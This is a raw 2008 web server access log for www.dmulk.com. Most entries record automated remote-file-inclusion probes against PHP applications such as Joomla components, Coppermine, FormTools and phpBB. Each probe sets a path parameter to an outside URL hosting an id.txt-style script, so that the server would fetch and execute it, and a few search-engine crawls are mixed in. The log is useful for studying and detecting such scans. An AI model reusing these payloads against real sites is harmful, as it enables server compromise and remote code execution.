213.168.176.11 - - [23/Jul/2008:09:38:12 -0700] "GET /logs/access_080329.log//index.php?mosConfig_absolute_path=http://www.symbols-larp.com/inschrijven/symbols8//inc/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:38:13 -0700] "GET /logs/access_080128.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:38:13 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:38:13 -0700] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.168.176.11 - - [23/Jul/2008:09:38:15 -0700] "GET //index.php?mosConfig_absolute_path=http://www.symbols-larp.com/inschrijven/symbols8//inc/var.txt?? HTTP/1.1" 200 18485 "-" "libwww-perl/5.805" "www.dmulk.com"
213.168.176.11 - - [23/Jul/2008:09:38:15 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://www.symbols-larp.com/inschrijven/symbols8//inc/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:38:21 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:38:21 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:38:41 -0700] "GET /logs/access_071224.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:39:08 -0700] "GET /logs/access_080303.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [23/Jul/2008:09:39:09 -0700] "GET /logs/errors.php?error=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [23/Jul/2008:09:39:10 -0700] "GET /errors.php?error=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.27.149.4 - - [23/Jul/2008:09:39:27 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.27.149.4 - - [23/Jul/2008:09:39:27 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.127 - - [23/Jul/2008:09:40:02 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.versola.org/bbclone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:40:03 -0700] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:40:03 -0700] "GET /logs/access_080128.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:40:03 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:40:05 -0700] "GET /logs/access_071224.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [23/Jul/2008:09:40:05 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.versola.org/bbclone/id.txt?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [23/Jul/2008:09:40:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.versola.org/bbclone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:40:58 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.larisco.com/gbrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.23.133 - - [23/Jul/2008:09:40:59 -0700] "GET /logs/access_080329.log/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://elvisjunior.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.23.133 - - [23/Jul/2008:09:40:59 -0700] "GET /plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://elvisjunior.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.23.133 - - [23/Jul/2008:09:40:59 -0700] "GET /logs/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://elvisjunior.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:41:00 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.larisco.com/gbrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:41:03 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.larisco.com/gbrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.116.50.181 - - [23/Jul/2008:09:41:05 -0700] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.116.50.181 - - [23/Jul/2008:09:41:05 -0700] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.131.43 - - [23/Jul/2008:09:41:17 -0700] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [23/Jul/2008:09:41:17 -0700] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [23/Jul/2008:09:41:18 -0700] "GET /logs/access_080309.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:41:26 -0700] "GET /logs/access_071224.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:41:26 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:41:27 -0700] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:41:28 -0700] "GET /logs/access_071224.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:41:28 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:41:28 -0700] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:41:29 -0700] "GET /logs/access_080128.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:41:30 -0700] "GET /logs/access_080128.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.18.5.126 - - [23/Jul/2008:09:41:41 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.126 - - [23/Jul/2008:09:41:41 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.126 - - [23/Jul/2008:09:41:42 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.126 - - [23/Jul/2008:09:41:42 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:42:06 -0700] "GET /logs/access_080225.log/My_eGallery/public/displayCategory.php?basepath=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:42:06 -0700] "GET /My_eGallery/public/displayCategory.php?basepath=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:42:06 -0700] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:42:17 -0700] "GET /logs/access_080218.log//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:42:18 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.249.67.135 - - [23/Jul/2008:09:42:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.135 - - [23/Jul/2008:09:42:38 -0700] "GET /mobileoffice/?N=D HTTP/1.1" 200 5024 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:42:41 -0700] "GET /logs/access_080218.log//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:42:41 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:42:49 -0700] "GET /logs/access_080218.log/My_eGallery/public/displayCategory.php?basepath=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.131.43 - - [23/Jul/2008:09:42:49 -0700] "GET /logs/access_080513.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [23/Jul/2008:09:42:49 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [23/Jul/2008:09:42:49 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [23/Jul/2008:09:42:49 -0700] "GET /logs/access_080507.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:42:50 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:42:53 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:42:53 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.27.149.4 - - [23/Jul/2008:09:42:53 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.27.149.4 - - [23/Jul/2008:09:42:54 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:42:55 -0700] "GET /logs/access_080207.log//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:42:56 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:42:58 -0700] "GET /logs/access_080225.log/My_eGallery/public/displayCategory.php?basepath=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:42:59 -0700] "GET /My_eGallery/public/displayCategory.php?basepath=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:42:59 -0700] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:43:04 -0700] "GET /logs/access_080218.log//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:43:05 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:43:05 -0700] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:43:22 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:43:25 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:43:28 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.8.25 - - [23/Jul/2008:09:43:34 -0700] "GET /main.php?pagina=http://grupo.e-sportv.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:43:37 -0700] "GET /logs/access_080207.log//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.195.37.178 - - [23/Jul/2008:09:43:37 -0700] "GET /logs/access_080329.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:43:38 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.larisco.com/gbrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:43:47 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.larisco.com/gbrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.23.1 - - [23/Jul/2008:09:43:50 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.larisco.com/gbrl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:43:55 -0700] "GET /logs/access_080311.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [23/Jul/2008:09:43:59 -0700] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [23/Jul/2008:09:44:02 -0700] "GET /logs/access_080309.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [23/Jul/2008:09:44:02 -0700] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:44:14 -0700] "GET /logs/access_080207.log//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:44:19 -0700] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:44:20 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:44:20 -0700] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:44:21 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:44:32 -0700] "GET /logs/access_080329.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:44:37 -0700] "GET /logs/administrator/components/dfd_cart/app.lib/product.control/core.php/product=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:44:42 -0700] "GET /administrator/components/dfd_cart/app.lib/product.control/core.php/product=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:44:43 -0700] "GET /logs/access_080311.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:44:48 -0700] "GET /logs/access_080225.log/My_eGallery/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:44:48 -0700] "GET /My_eGallery/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:44:49 -0700] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:44:49 -0700] "GET /logs/access_080225.log/My_eGallery/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:44:50 -0700] "GET /My_eGallery/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:44:50 -0700] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.107.222.20 - - [23/Jul/2008:09:44:51 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.107.222.20 - - [23/Jul/2008:09:44:51 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:45:02 -0700] "GET /logs/access_080313.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:45:03 -0700] "GET /logs/access_080313.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.246 - - [23/Jul/2008:09:45:09 -0700] "GET /logs/access_080424.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.113.203.55 - - [23/Jul/2008:09:45:10 -0700] "GET /logs/access_080513.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [23/Jul/2008:09:45:12 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [23/Jul/2008:09:45:12 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:45:12 -0700] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:45:12 -0700] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:45:13 -0700] "GET /My_eGallery/public/displayCategory.php?basepath=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:45:13 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:45:24 -0700] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:45:25 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.113.203.55 - - [23/Jul/2008:09:45:31 -0700] "GET /logs/access_080507.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:45:32 -0700] "GET /logs/modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:45:32 -0700] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:45:33 -0700] "GET /logs/access_080329.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
